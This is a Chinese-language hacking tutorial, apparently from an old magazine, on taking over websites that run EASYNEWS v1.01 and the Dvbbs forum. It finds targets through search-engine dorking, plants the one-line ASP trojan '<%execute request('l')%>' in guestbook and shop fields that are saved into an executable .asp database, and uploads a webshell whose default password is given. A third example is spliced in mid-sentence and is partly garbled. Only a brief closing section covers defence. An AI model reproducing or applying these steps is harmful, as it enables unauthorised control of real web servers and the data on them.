實例壹:“壹句話木馬”入侵“EASYNEWS新聞管理系統”
“EASYNEWS新聞管理系統 v1.01 正式版”是在企業網站中非常常見的壹套整站模版,在該網站系統的留言本組件中就存在著數據過濾不嚴漏洞,如果網站是默認路徑和默認文件名安裝的話,入侵者可以利用該漏洞直接上傳ASP木馬程序控制整個網站服務器。
Step1 搜索入侵目標
使用了“EASYNEWS新聞管理系統 v1.01 正式版”的網站,在網站頁面的底部版權聲明處,往往會有關鍵字符為“www.****.COM 版權所有”。只要在GOOGLE或百度中以該字符串為關鍵詞進行搜索,就可以找到大量的入侵目標。
Step2 檢測入侵條件
在這裏,我們以網站“/news/index.htm”為例進行壹次入侵檢測。“EASYNEWS新聞管理系統”網站的留言本數據庫文件默認是位於“\ebook\db\ebook.asp”,首先在瀏覽器地址欄中輸入“/news/ebook/db/ebook.asp”,回車後在瀏覽器頁面中將顯示訪問留言本數據庫文件的返回信息。如果在頁面中顯示亂碼,則說明該網站的留言本數據庫文件沒有改名,可以進行入侵。
Step3 在數據庫中插入ASP後門
前面提到了該新聞系統的留言本插件存在過濾不嚴,因此我們可以通過提交發言,在數據庫中插入“壹句話木馬”服務端代碼:
在瀏覽器中訪問“/news/khly.htm”,打開提交留言頁面。在提交頁面中的“主頁”欄中,直接填寫“壹句話木馬”服務端代碼,其它隨便填寫。確定後點擊“發表留言”按鈕,文章發表成功後,即可將“壹句話木馬”服務端代碼插入到留言本數據庫中了。
Step4 連接後門上傳Webshell
由於留言本數據庫文件“ebook.asp”是壹個ASP文件,所以我們插入到數據庫文件中的ASP語句將會被執行。將“壹句話木馬”客戶端中的提交地址改為留言本數據庫文件地址,然後用瀏覽器打開客戶端,在上方的輸入框中輸入上傳ASP木馬的保存路徑,在下面的輸入框中可以粘貼入其它的ASP木馬代碼,這裏選擇的是桂林老兵網站管理助手ASP代碼。點擊提交按鈕後,剛才粘貼的ASP木馬將被寫入到論壇服務器中保存。
Step5 打開WEBSHELL
上傳的ASP木馬被保存到與數據庫文件同壹WEB目錄下,文件名為“temp.asp”,因此我們在IE瀏覽器中打開頁面“/news/ebook/db/temp.asp”,輸入默認的密碼“gxgl.com”,就可以看到壹個WEBSHELL了。
在Webshell中可以上傳其它的文件或者安裝木馬後門、執行各種命令等,網站的服務器已經掌握在我們的手中,可以為所欲為了。
實例二 “社區超市”入侵動網論壇
Step1 檢測入侵條件
以入侵論壇“/”為例。首先在瀏覽器地址欄中輸入“/data/shop.asp”,回車後在瀏覽器頁面中將顯示訪問"shop.asp"文件的返回信息。說明該論壇的社區超市數據庫文件沒有改名或刪除,可以進行入侵。
Step2 在數據庫中插入ASP後門
登錄論壇後,點擊頁面中的“娛樂”→“社區超市”,打開社區超市頁面。在該頁面中選擇商店申請,打開“商店申請入駐”頁面“/z_shop_newshop.asp”,在頁面中填寫任意信息,註意在“商店招牌”欄中,添加剛才的ASP代碼"〈%execute request("l")%〉"。確定後點擊“申請”按鈕進行提交,即可將ASP代碼保存在數據庫文件中了。
後面的步驟就與上面介紹的壹樣了,只需要用藍屏木馬連接數據庫文件“”為例。在瀏覽器中打開“/join/listall.asp?bid=2”,將地址欄中join後的/改為%5c,在提交後的返回返回信息中可以看到網站數據庫地址:“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”,數據庫文件名中加入了“#”符號,“#”符號在IE中執行時被解釋為中斷符,要訪問該數據庫文件則必須將“#”號變為“23%”才可以。因此數據庫文件的實際WEB地址為“/join/admin/adshuilonG!%23).asp”
Step2 註冊網站,插入“壹句話木馬”
由於數據庫文件是ASP文件格式的,滿足入侵條件,因此現在我們需要將“壹句話木馬”插入到數據庫文件中去。
在網頁上點擊註冊網站按鈕,打開註冊鏈接“/join/add.asp過濾了=step3&bid=3”,在資料填寫頁面處的站點名稱或地址中寫入“壹句話木馬”服務端代碼,其它隨便填寫。然後點擊完成按鈕提交數據,木馬服務端就被插入到數據庫文件中了。
最後只需要用藍屏木馬連接數據庫文件“/join/admin/adshuilonG!%23).asp”,然後上傳ASP木馬就可以控制該網站的服務器了。
“壹句話木馬”的防範
要防範“壹句話木馬”可以從兩方面進行,首先是要隱藏網站的數據庫,不要讓攻擊者知道數據庫文件的鏈接地址。這就需要管理員在網頁程序中查被暴庫漏洞,在數據庫連接文件中加入容錯代碼等,具體的防暴庫方法在這裏就不作過多的講解了。
其次就是要防止用戶提交的數據未過濾漏洞,對用戶提交的數據進行過濾,替換壹些危險的代碼等。例如中國站長聯盟網站在出現該漏洞後已經對網頁程序進行的修補,插入的ASP代碼中的〈、〉和"等字符會被網頁程序轉換成其它字符,致使服務端代碼無法正常執行。
只要作好這兩方面的安全工作,“壹句話木馬”雖然無孔不入,但是面對這樣的網站系統也是無可奈何的了。